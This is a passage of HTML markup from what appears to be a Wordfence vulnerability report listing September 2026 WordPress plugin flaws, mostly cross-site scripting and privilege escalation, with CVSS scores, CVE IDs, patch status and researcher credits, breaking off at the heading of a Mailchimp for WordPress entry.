</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2406db9d-ab51-4a16-83ba-5076135a0369" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b62b8619-4348-4cf7-a572-aa6df20bdc3a" target="_blank" rel="noopener">YS LeadGen – Popups, Opt-ins &amp; Lead Capture &lt;= 2.1.4 &#8211; Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting via User Input</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1256" target="_blank" rel="noopener noreferrer">							CVE-2026-1256						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ysleadgen" target="_blank" rel="noopener">YS LeadGen – Drag and Drop Popup Builder, Form Builder, Exit Intent Popups &amp; Lead Capture for WordPress</a> <span class="wfvr-software-slug">[ysleadgen]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kamphon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/39a7def5853f4863ea01b33211f8312b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="39a7def5853f4863ea01b33211f8312b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kamphon" target="_blank" rel="noopener">Powpy</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/waris-damkham" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d923d0a20877857f86aaa6c686c92bdc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d923d0a20877857f86aaa6c686c92bdc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/waris-damkham" target="_blank" rel="noopener">Waris Damkham</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b62b8619-4348-4cf7-a572-aa6df20bdc3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9655379f-9fbe-4d19-a0b7-2fe640be09be" target="_blank" rel="noopener">Add User Autocomplete &lt; 1.2 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87759" target="_blank" rel="noopener noreferrer">							CVE-2026-87759						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/add-user-autocomplete" target="_blank" rel="noopener">Add User Autocomplete</a> <span class="wfvr-software-slug">[add-user-autocomplete]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-huu-do-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a5e6ae3bd4b10178c1dfaeb2bb6b91c4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a5e6ae3bd4b10178c1dfaeb2bb6b91c4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-huu-do-2" target="_blank" rel="noopener">Nguyen Huu Do</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9655379f-9fbe-4d19-a0b7-2fe640be09be" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5be9a2f4-f3de-40e4-80ce-b8588e6318bf" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt; 2.4.10 &#8211; Authenticated (Custom Role+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77705" target="_blank" rel="noopener noreferrer">							CVE-2026-77705						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5be9a2f4-f3de-40e4-80ce-b8588e6318bf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de30d07e-4579-44e8-9527-61751d9e12de" target="_blank" rel="noopener">PuppyFW &lt;= 0.4.4 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88904" target="_blank" rel="noopener noreferrer">							CVE-2026-88904						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/puppyfw" target="_blank" rel="noopener">PuppyFW</a> <span class="wfvr-software-slug">[puppyfw]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de30d07e-4579-44e8-9527-61751d9e12de" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/216f1faf-362a-4218-93f1-9f1f4ad171aa" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder &lt; 5.2.8 &#8211; Authenticated (Author+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-80071" target="_blank" rel="noopener noreferrer">							CVE-2026-80071						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonathan-dersch" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/50eed0e6c3616a3070c5f1b5345192dd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="50eed0e6c3616a3070c5f1b5345192dd"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonathan-dersch" target="_blank" rel="noopener">Jonathan Dersch</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/216f1faf-362a-4218-93f1-9f1f4ad171aa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae8c1d8e-8a87-4dd8-b7f5-c6655d3f6451" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder 4.4.6 &#8211; 5.2.7 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86406" target="_blank" rel="noopener noreferrer">							CVE-2026-86406						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration" target="_blank" rel="noopener">User Registration &amp; Membership – Free &amp; Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration &amp; Login Builder</a> <span class="wfvr-software-slug">[user-registration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ae8c1d8e-8a87-4dd8-b7f5-c6655d3f6451" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e24a672b-0ba4-4061-971d-255a61aed60b" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots plugin for WordPress &lt;= 2.15.22 &#8211; Reflected Cross-Site Scripting via &#8216;icn&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18555" target="_blank" rel="noopener noreferrer">							CVE-2026-18555						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e24a672b-0ba4-4061-971d-255a61aed60b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8645b58-6b2a-4659-a002-d622453bea42" target="_blank" rel="noopener">Booking Calendar &lt;= 11.8.2 &#8211; Reflected Cross-Site Scripting via &#8216;options&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92561" target="_blank" rel="noopener noreferrer">							CVE-2026-92561						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">Booking Calendar</a> <span class="wfvr-software-slug">[booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e8645b58-6b2a-4659-a002-d622453bea42" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02ff0705-aff7-45aa-ad38-f371438edd69" target="_blank" rel="noopener">Design Scuole Italia &lt;= 2.18.2 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87793" target="_blank" rel="noopener noreferrer">							CVE-2026-87793						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-87791" target="_blank" rel="noopener">design-scuole-wordpress-theme</a> <span class="wfvr-software-slug">[design-scuole-wordpress-theme]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
									<strong>Researcher(s):</strong> Unknown
							</div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02ff0705-aff7-45aa-ad38-f371438edd69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d11b5a8c-c647-4476-b749-b7048d4d06d1" target="_blank" rel="noopener">Dictionary &lt;= 1.0 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15697" target="_blank" rel="noopener noreferrer">							CVE-2025-15697						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dictionary" target="_blank" rel="noopener">Dictionary</a> <span class="wfvr-software-slug">[dictionary]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hassan-khan-yusufzai-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/70a475bab665724f74ae237f9744cf62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="70a475bab665724f74ae237f9744cf62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hassan-khan-yusufzai-2" target="_blank" rel="noopener">Hassan Khan Yusufzai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d11b5a8c-c647-4476-b749-b7048d4d06d1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8b0f381-c07c-4560-bb5c-3a6aee442390" target="_blank" rel="noopener">EmbedPress &lt;= 4.6.5 &#8211; Reflected Cross-Site Scripting via &#8216;hash&#8217; and &#8216;unique&#8217; Parameters</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89330" target="_blank" rel="noopener noreferrer">							CVE-2026-89330						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/embedpress" target="_blank" rel="noopener">EmbedPress – PDF Embedder, 3D PDF FlipBook, Google Reviews, YouTube Videos, Upload &amp; Embed PDF documents</a> <span class="wfvr-software-slug">[embedpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/crow" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3b95ab4bfdfee3dfe4486b79b2098242.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3b95ab4bfdfee3dfe4486b79b2098242"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/crow" target="_blank" rel="noopener">crow</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8b0f381-c07c-4560-bb5c-3a6aee442390" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32c70189-cb0f-4804-8d1f-2bd6915012ab" target="_blank" rel="noopener">Estatik &lt;= 4.3.4 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76790" target="_blank" rel="noopener noreferrer">							CVE-2026-76790						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/estatik" target="_blank" rel="noopener">Estatik Real Estate Plugin</a> <span class="wfvr-software-slug">[estatik]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/79ed370a05dae7cb22b4e00d79829131.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="79ed370a05dae7cb22b4e00d79829131"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/morato-antoine" target="_blank" rel="noopener">Morato Antoine</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/32c70189-cb0f-4804-8d1f-2bd6915012ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef089712-f717-4023-a0e4-d7924c904aa3" target="_blank" rel="noopener">LearnPress &lt;= 4.4.6 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86444" target="_blank" rel="noopener noreferrer">							CVE-2026-86444						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ef089712-f717-4023-a0e4-d7924c904aa3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee4f837a-d0b5-48df-8c96-2a294985612e" target="_blank" rel="noopener">MC4WP: Mailchimp for WordPress &lt;= 4.14.0 &#8211; Reflected Cross-Site Scripting via &#8216;data&#8217; Dynamic Content Tag</a></h4>
